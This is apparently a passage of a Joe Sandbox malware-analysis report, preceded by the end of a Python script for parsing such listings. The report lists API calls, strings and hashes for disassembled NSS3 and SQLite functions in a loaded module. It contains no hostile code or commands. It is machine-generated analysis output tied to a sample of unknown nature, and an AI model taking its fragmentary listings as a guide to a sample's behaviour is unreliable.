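                subcall_of=int(sub, 16) if sub else None,
            ))
            continue
        off = OFFSET_RE.search(line)
        if off and base is None:
            base = int(off.group(1), 16)
    return base, calls


def rva(call: ApiCall, base: int) -> int:
    """Call-site address relative to the module base, for lookup in the on-disk DLL."""
    return call.ref - base


def calls_per_module(calls: List[ApiCall]) -> Counter:
    """Number of call sites per imported module (subcalls included)."""
    return Counter(c.module for c in calls)


def literal_strings(calls: List[ApiCall]) -> List[str]:
    """Arguments that are neither '?' nor 8-hex-digit values: the literal
    strings the function references (compare the record's 'String ID' line)."""
    found = {a for c in calls for a in c.args
             if a != "?" and not HEX32_RE.fullmatch(a)}
    return sorted(found)


if __name__ == "__main__":
    base, calls = parse_listing(SAMPLE_LISTING)
    print(f"module base: {base:08X}")
    for c in calls:
        print(f"  {c.module:<30} {c.func:<28} rva={rva(c, base):06X}")
    print(calls_per_module(calls))
    print(literal_strings(calls))
```

Feeding a whole record through `parse_listing` gives the RVAs needed to locate each call site in an on-disk copy of the DLL, and `calls_per_module` shows at a glance which records are pure NSS3 internals and which touch KERNEL32 or the CRT.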
APIs
• PORT_ArenaMark_Util.NSS3(?), ref: 6C4DACC4
• PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6C4DACD5
• memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6C4DACF3
• SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6C4DAD3B
• SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C4DADC8
• PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4DADDF
• PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4DADF0
  • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
• SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C4DB06A
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4DB08C
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C4DB1BA
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C4DB27C
                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,00002010), ref: 6C4DB2CA
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4DB3C1
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4DB40C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1285963562-0
                                                                                                                                                                                                                          • Opcode ID: e006eef8e4eca0f3b98ee6127328d5f3a2c7fc41dbd0bc686811982adcb2c3ce
                                                                                                                                                                                                                          • Instruction ID: 3c7879ab5c02910b5b40b93fec9718ec6afcaea9f7c0994789f7d05137e82106
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e006eef8e4eca0f3b98ee6127328d5f3a2c7fc41dbd0bc686811982adcb2c3ce
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C022BE71A04300AFE700EF14CC55F9A77E1AF8430CF25856CE8595B7A2E772E859CB96
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C4225F3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • H, xrefs: 6C42329F
                                                                                                                                                                                                                          • cannot join using column %s - column not present in both tables, xrefs: 6C4232AB
                                                                                                                                                                                                                          • too many references to "%s": max 65535, xrefs: 6C422FB6
                                                                                                                                                                                                                          • no such table: %s, xrefs: 6C4226AC
                                                                                                                                                                                                                          • too many columns in result set, xrefs: 6C423012
                                                                                                                                                                                                                          • recursive reference in a subquery: %s, xrefs: 6C4222E5
                                                                                                                                                                                                                          • cannot have both ON and USING clauses in the same join, xrefs: 6C4232B5
                                                                                                                                                                                                                          • '%s' is not a function, xrefs: 6C422FD2
                                                                                                                                                                                                                          • access to view "%s" prohibited, xrefs: 6C422F4A
                                                                                                                                                                                                                          • multiple recursive references: %s, xrefs: 6C4222E0
                                                                                                                                                                                                                          • no tables specified, xrefs: 6C4226BE
                                                                                                                                                                                                                          • H, xrefs: 6C42322D
                                                                                                                                                                                                                          • no such index: "%s", xrefs: 6C42319D
                                                                                                                                                                                                                          • table %s has %d values for %d columns, xrefs: 6C42316C
                                                                                                                                                                                                                          • %s.%s.%s, xrefs: 6C42302D
                                                                                                                                                                                                                          • unsafe use of virtual table "%s", xrefs: 6C4230D1
                                                                                                                                                                                                                          • a NATURAL join may not have an ON or USING clause, xrefs: 6C4232C1
                                                                                                                                                                                                                          • %s.%s, xrefs: 6C422D68
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                          • String ID: %s.%s$%s.%s.%s$'%s' is not a function$H$H$a NATURAL join may not have an ON or USING clause$access to view "%s" prohibited$cannot have both ON and USING clauses in the same join$cannot join using column %s - column not present in both tables$multiple recursive references: %s$no such index: "%s"$no such table: %s$no tables specified$recursive reference in a subquery: %s$table %s has %d values for %d columns$too many columns in result set$too many references to "%s": max 65535$unsafe use of virtual table "%s"
                                                                                                                                                                                                                          • API String ID: 3510742995-3400015513
                                                                                                                                                                                                                          • Opcode ID: dfbb6cb7bfce673a14458ee51b07af61acdb06a392534ec69f5b27ad91f17c08
                                                                                                                                                                                                                          • Instruction ID: 0df73f0f68d14d4ffff84c62cb68cf6dfc465f22f528f58ae12982e691c99c92
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dfbb6cb7bfce673a14458ee51b07af61acdb06a392534ec69f5b27ad91f17c08
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04D2AF70E14209CFDB24CF95C485F9DBBB1FF49328F288169D855ABB51DB39A842CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • sqlite3_initialize.NSS3 ref: 6C45ED38
                                                                                                                                                                                                                            • Part of subcall function 6C3F4F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C3F4FC4
                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(snippet), ref: 6C45EF3C
                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(offsets), ref: 6C45EFE4
                                                                                                                                                                                                                            • Part of subcall function 6C51DFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C3F5001,?,00000003,00000000), ref: 6C51DFD7
                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(matchinfo), ref: 6C45F087
                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(matchinfo), ref: 6C45F129
                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(optimize), ref: 6C45F1D1
                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C45F368
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
                                                                                                                                                                                                                          • String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
                                                                                                                                                                                                                          • API String ID: 2518200370-449611708
                                                                                                                                                                                                                          • Opcode ID: 054a2908f7ce6e0132ddeca95b9e5126695c27f784df0f7a33c09236be0c55f1
                                                                                                                                                                                                                          • Instruction ID: 1932adc27df13985bd953630774d69a444771f04c9ecd4b27cd453ee63896bbe
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 054a2908f7ce6e0132ddeca95b9e5126695c27f784df0f7a33c09236be0c55f1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B02EEB1B057014BF704DF619C85F2B36B2BBC5208F54893CD85A97B40EB79E9668B83
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4D7C33
                                                                                                                                                                                                                          • NSS_OptionGet.NSS3(0000000C,00000000), ref: 6C4D7C66
                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(00000000), ref: 6C4D7D1E
                                                                                                                                                                                                                            • Part of subcall function 6C4D7870: SECOID_FindOID_Util.NSS3(?,?,?,6C4D91C5), ref: 6C4D788F
• SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C4D7D48
• PR_SetError.NSS3(FFFFE067,00000000), ref: 6C4D7D71
• SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C4D7DD3
• SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C4D7DE1
• PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4D7DF8
• SECKEY_DestroyPublicKey.NSS3(?), ref: 6C4D7E1A
• PR_SetError.NSS3(FFFFE067,00000000), ref: 6C4D7E58
  • Part of subcall function 6C4D7870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C4D91C5), ref: 6C4D78BB
  • Part of subcall function 6C4D7870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6C4D91C5), ref: 6C4D78FA
  • Part of subcall function 6C4D7870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6C4D91C5), ref: 6C4D7930
  • Part of subcall function 6C4D7870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C4D91C5), ref: 6C4D7951
  • Part of subcall function 6C4D7870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4D7964
  • Part of subcall function 6C4D7870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C4D797A
  • Part of subcall function 6C4D7870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C4D7988
  • Part of subcall function 6C4D7870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6C4D7998
  • Part of subcall function 6C4D7870: free.MOZGLUE(00000000), ref: 6C4D79A7
  • Part of subcall function 6C4D7870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6C4D91C5), ref: 6C4D79BB
  • Part of subcall function 6C4D7870: PR_GetCurrentThread.NSS3(?,?,?,?,6C4D91C5), ref: 6C4D79CA
• SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C4D7E49
• SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C4D7F8C
• SECKEY_DestroyPublicKey.NSS3(?), ref: 6C4D7F98
• SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C4D7FBF
• SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C4D7FD9
• PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6C4D8038
• SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C4D8050
• PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C4D8093
• SECOID_FindOID_Util.NSS3 ref: 6C4D7F29
  • Part of subcall function 6C4D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C478298,?,?,?,6C46FCE5,?), ref: 6C4D07BF
  • Part of subcall function 6C4D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C4D07E6
  • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D081B
  • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D0825
• SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C4D8072
• SECOID_FindOID_Util.NSS3 ref: 6C4D80F5
  • Part of subcall function 6C4DBC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6C4D800A,00000000,?,00000000,?), ref: 6C4DBC3F
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
• String ID:
• API String ID: 2815116071-0
• Opcode ID: 529d4b8f5aaafb1214ffb1661fa1b24f15336bd7d13b7941cd53fdf6c6c6791d
• Instruction ID: 612b983522e8243ac1a4131cbb06d60ed35fa1bbffc70fcaafc7fc15a2282a88
• Opcode Fuzzy Hash: 529d4b8f5aaafb1214ffb1661fa1b24f15336bd7d13b7941cd53fdf6c6c6791d
• Instruction Fuzzy Hash: E3E1C2706093019FE710EF28D890F6AB7E5AF44709F12492DE8899BB55E732FC05CB92
APIs
• GetCurrentProcess.KERNEL32 ref: 6C461C6B
• OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6C461C75
• GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6C461CA1
• GetLengthSid.ADVAPI32(?), ref: 6C461CA9
• malloc.MOZGLUE(00000000), ref: 6C461CB4
• CopySid.ADVAPI32(00000000,00000000,?), ref: 6C461CCC
• GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6C461CE4
• GetLengthSid.ADVAPI32(?), ref: 6C461CEC
• malloc.MOZGLUE(00000000), ref: 6C461CFD
• CopySid.ADVAPI32(00000000,00000000,?), ref: 6C461D0F
• CloseHandle.KERNEL32(?), ref: 6C461D17
• AllocateAndInitializeSid.ADVAPI32 ref: 6C461D4D
• GetLastError.KERNEL32 ref: 6C461D73
• PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6C461D7F
Strings
• _PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6C461D7A
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
• String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
• API String ID: 3748115541-1216436346
• Opcode ID: 3e8305179aed0449193628a49959adf63202d0607b103ad970aa1416d67ef101
• Instruction ID: 6755391e972279a1cfe59d7bdfba78a1f0c7282783b67a1b42084e011ac87112
• Opcode Fuzzy Hash: 3e8305179aed0449193628a49959adf63202d0607b103ad970aa1416d67ef101
• Instruction Fuzzy Hash: 723157B1A01618AFDF10EF64CC48BAA7BB8FF4A345F014169F60992650E7306E94CF6D
APIs
• __aulldiv.LIBCMT ref: 6C463DFB
• __allrem.LIBCMT ref: 6C463EEC
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C463FA3
• memcpy.VCRUNTIME140(?,?,00000001), ref: 6C464047
• memcpy.VCRUNTIME140(?,?,00000000), ref: 6C4640DE
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C46415F
• __allrem.LIBCMT ref: 6C46416B
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C464288
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C4642AB
• __allrem.LIBCMT ref: 6C4642B7
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
• String ID: %02d$%03d$%04d$%lld
• API String ID: 703928654-3678606288
• Opcode ID: a42e878d35b84fba7fd384698cbebc13caf4d9880f7e5952ce197ea5304d6040
• Instruction ID: 0ab4c33ba4f61d1b18f0ea017116dea77a61f14442b42f3a18eb332985034b73
• Opcode Fuzzy Hash: a42e878d35b84fba7fd384698cbebc13caf4d9880f7e5952ce197ea5304d6040
• Instruction Fuzzy Hash: 34F12271A087809FDB15CF39C850F6BB7F6AF86348F148A1DE48597B55E730D8868B42
APIs
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C46EF63
  • Part of subcall function 6C4787D0: PORT_NewArena_Util.NSS3(00000800,6C46EF74,00000000), ref: 6C4787E8
  • Part of subcall function 6C4787D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,6C46EF74,00000000), ref: 6C4787FD
  • Part of subcall function 6C4787D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C47884C
• PL_strncasecmp.NSS3(oid.,?,00000004), ref: 6C46F2D4
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C46F2FC
• SEC_StringToOID.NSS3(?,?,?,00000000), ref: 6C46F30F
• SECITEM_AllocItem_Util.NSS3(?,00000000,-00000002), ref: 6C46F374
                                                                                                                                                                                                                          • PL_strcasecmp.NSS3(6C5B2FD4,?), ref: 6C46F457
                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000029), ref: 6C46F4D2
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C46F66E
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE007,00000000), ref: 6C46F67D
                                                                                                                                                                                                                          • CERT_DestroyName.NSS3(?), ref: 6C46F68B
                                                                                                                                                                                                                            • Part of subcall function 6C478320: PORT_ArenaAlloc_Util.NSS3(0000002A,00000018), ref: 6C478338
                                                                                                                                                                                                                            • Part of subcall function 6C478320: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C478364
                                                                                                                                                                                                                            • Part of subcall function 6C478320: PORT_ArenaAlloc_Util.NSS3(0000002A,?), ref: 6C47838E
                                                                                                                                                                                                                            • Part of subcall function 6C478320: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4783A5
                                                                                                                                                                                                                            • Part of subcall function 6C478320: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4783E3
                                                                                                                                                                                                                            • Part of subcall function 6C4784C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000004,00000000,00000000), ref: 6C4784D9
                                                                                                                                                                                                                            • Part of subcall function 6C4784C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C478528
                                                                                                                                                                                                                            • Part of subcall function 6C478900: PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C478955
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Arena$Alloc_$ErrorFindItem_Tag_strlen$AllocArena_DestroyGrow_L_strcasecmpL_strncasecmpNameStringZfreememcpy
                                                                                                                                                                                                                          • String ID: "$*$oid.
                                                                                                                                                                                                                          • API String ID: 4161946812-2398207183
                                                                                                                                                                                                                          • Opcode ID: 9c98528fcc0ce187202d06441a4a1b65aa46c43aba212d731bb7403929fbc486
                                                                                                                                                                                                                          • Instruction ID: f286c6349870113f842c2b74314245c34adc8407fc8e868226c4de6770728951
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c98528fcc0ce187202d06441a4a1b65aa46c43aba212d731bb7403929fbc486
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E225B7160E3404BF710CE1AC890F6AB7E6AB85359F18462EE4D587F99E7319C06CB83
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C411D58
                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C411EFD
                                                                                                                                                                                                                          • sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6C411FB7
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • another row available, xrefs: 6C412287
                                                                                                                                                                                                                          • SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6C411F83
                                                                                                                                                                                                                          • sqlite_master, xrefs: 6C411C61
                                                                                                                                                                                                                          • attached databases must use the same text encoding as main database, xrefs: 6C4120CA
                                                                                                                                                                                                                          • no more rows available, xrefs: 6C412264
                                                                                                                                                                                                                          • table, xrefs: 6C411C8B
                                                                                                                                                                                                                          • sqlite_temp_master, xrefs: 6C411C5C
                                                                                                                                                                                                                          • abort due to ROLLBACK, xrefs: 6C412223
                                                                                                                                                                                                                          • unsupported file format, xrefs: 6C412188
                                                                                                                                                                                                                          • unknown error, xrefs: 6C412291
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
                                                                                                                                                                                                                          • String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
                                                                                                                                                                                                                          • API String ID: 563213449-2102270813
                                                                                                                                                                                                                          • Opcode ID: 21cbc5729982ada99b85cb3d0da024b092a14dd218a86b1599ff2efa3dc999b2
                                                                                                                                                                                                                          • Instruction ID: 85cefe7e81ad521ceca978931e28bc61dff3568743bf4eb5df4e8c4cadc03005
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 21cbc5729982ada99b85cb3d0da024b092a14dd218a86b1599ff2efa3dc999b2
